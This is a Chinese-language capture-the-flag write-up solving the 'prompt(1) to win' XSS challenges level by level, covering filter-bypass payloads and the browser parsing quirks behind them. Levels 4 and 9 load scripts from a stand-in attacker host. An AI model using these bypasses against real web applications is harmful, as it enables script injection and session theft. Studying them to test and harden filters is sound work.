前言
XSS 漏洞原理非常简单,实际应用中非常灵活,于是通过 prompt(1) to win 来学习学习
正文
工具
分析正则表达式
https://regex101.com/
http://xssor.io/
https://html5sec.org/
第0关
"><script>prompt(1)</script>\
第1关
正则过滤 < 由 > 包含的字符,所以需要不使用 > 的 payload
<style/onload="prompt(1)";//
<img/src=% onerror=prompt(1)//
过滤了= 和 ( , 而我们执行 prompt(1) 是需要 ( ,这里有一个知识点,浏览器会 <svg> 标签的中的元素认为是 xml 元素,会对其中的内容进行 html 实体解码。
<svg><script>prompt(1)</script>
或者使用 eval.call 执行 js 代码,函数参数为 js 字符串,所以可以使用 16进制编码。
<script>eval.call`${'promptu00281)'}`</script>
第3关
我们的输入被放置在注释里面,于是想办法闭合注释,不过 -> 被过滤,有一个知识点,--!> 也可以闭合注释
--!><svg/onload=prompt(1)
第4关
输入被做为 加载 js 资源的 url, 同时要以 http://prompt.ml/ 开头,于是可以使用 http://prompt.ml%2f@attack.com 加载远程攻击者的 js.( 先url解码才匹配,所以 / ---> %2f )
第5关
把 > , on***=, focus 过滤掉了, 我们的能力就是可以修改 input 标签的属性值,由于 focus 被过滤,利用 onfocus 和 autofocus 组合的方式也不能利用了。
知识点介绍
- 如果出现两个相同的属性值,后面的属性值被忽略。
.+?正则不会跨行匹配,但是 浏览器 可以 跨行匹配,比如onerror =正则匹配不上,但是 浏览器 可以正常处理
于是 payload
" type="image" src=# onerror
="prompt(1)
第6关
用我们的输入构造了一个 form 表单,然后自动提交。
我们可以控制的东西有
action的值input的value和name值
如果没有下面的 !/script:|data:/i.test(document.forms[0].action) , 我们可以直接设置 action 为 javascript:prompt(1) 或者 vbscript:prompt(1)。
知识点:
document.forms[0].action
获取属性值时,如果子标签内有 name="action" 的子标签的话,会返回该子标签。 也可以说 document.forms[0].action 先回去找 该标签内部name="action" 的子标签, 如果有返回全部满足条件的子标签,如果没有则返回 该标签的 action 属性值。
所以绕过方式就是,先设置 form.action=javascript:prompt(1), 然后在 form 标签内构造一个 name="action" 的子标签。
javascript:prompt(1)#{"action":"sss"}
第7关
把我们的输入用 # 分割, 用每一项来新建一个 <p>标签, 项的值作为 <p>标签的 title 属性值,唯一的限制每一项长度最长为 12 个字符
解决方法是利用 javascript 的注释符 /**/ 和 javascript 语法的松散性。
"><script>/*#*/prompt(/*#*/1)/*#*/</script>
生成的 html
<p class="comment" title=""><script>/*"></p>
<p class="comment" title="*/prompt(/*"></p>
<p class="comment" title="*/1)/*"></p>
<p class="comment" title="*/</script>"></p>
简化后的有效 payload
<script>/*...*/prompt(/*...*/1)/*...*/</script>
或者
"><svg/a=#"onload='/*#*/prompt(1)'
生成的 html
<p class="comment" title=""><svg/a="></p>
<p class="comment" title=""onload='/*"></p>
<p class="comment" title="*/prompt(1)'"></p>
第8关
输入位于一个被注释了的 console.log 函数参数里面, 第一步自然是绕过注释,// 是单行注释,所以只要用换行符进入下一行即可,问题就是
和
被过滤。
知识点
javascript 还支持 unicode 的换行符
U+2028 http://codepoints.net/U+2028
U+2029 http://codepoints.net/U+2029
在 chrome 和 firefox 下 --> 可以作为 javascript 的注释符,不过最新的 chrome 貌似没用
[U+2028]prompt(1)[U+2028]-->
可以用 python 或者 console.log 输出 unicode 字符
把结果复制,然后粘贴即可,在 010editor 下看看 16 进制
这个 3f 应该就是 [U+2028] 了
第9关
过滤了标签的开头,字符全部转大写。
这里需要知道,unicode 码包含了许多国家的语言文字,有一些语言的字母调用 Upper 函数进行大写,由于没有对应的大写文字,会自动的转换为英文字母,而在 url 中,协议和域名是不区分大小写的这时,我们就可以进行利用了。
首先,我们可以在控制台写一个循环来查找 Upper 之后是S 的字符。
for (i=0;i<=100000;i++){
if (String.fromCharCode(i).toUpperCase()=="S"){
console.log(i)
console.log(String.fromCharCode(i))
}
}
最后的 payload
<ſvg><ſcript/href=attack.com>
第10关
首先替换 prompt 为 alert ,后面又 清除了 ' , 这种 前过滤 后 清除 的做法,可以用来绕过前面的过滤.
pro'mpt(1)
第11关
过滤之后,进入 <script> 作为赋值字符串的一部分。
有一个知识点,在脚本环境中,"string"(alert(1)) 不会报错,且会正确执行,而为了使语法正确,使用 in 关键字
"(prompt(1))in"
第12关
第 10 关的一个改进,先过滤然后才清除。
在 javascript 中可以 使用 parseInt 把字符串转成数字,然后用 (num).toString 转成字符串, 同时还有一个有意思的点,用 eval 执行 function_name 返回值就是该函数的对象。于是
eval((630038579).toString(30))(1)
参考
https://lorexxar.cn/2015/07/02/xss-p/
https://hellohxk.com/blog/prompt-1-writeup/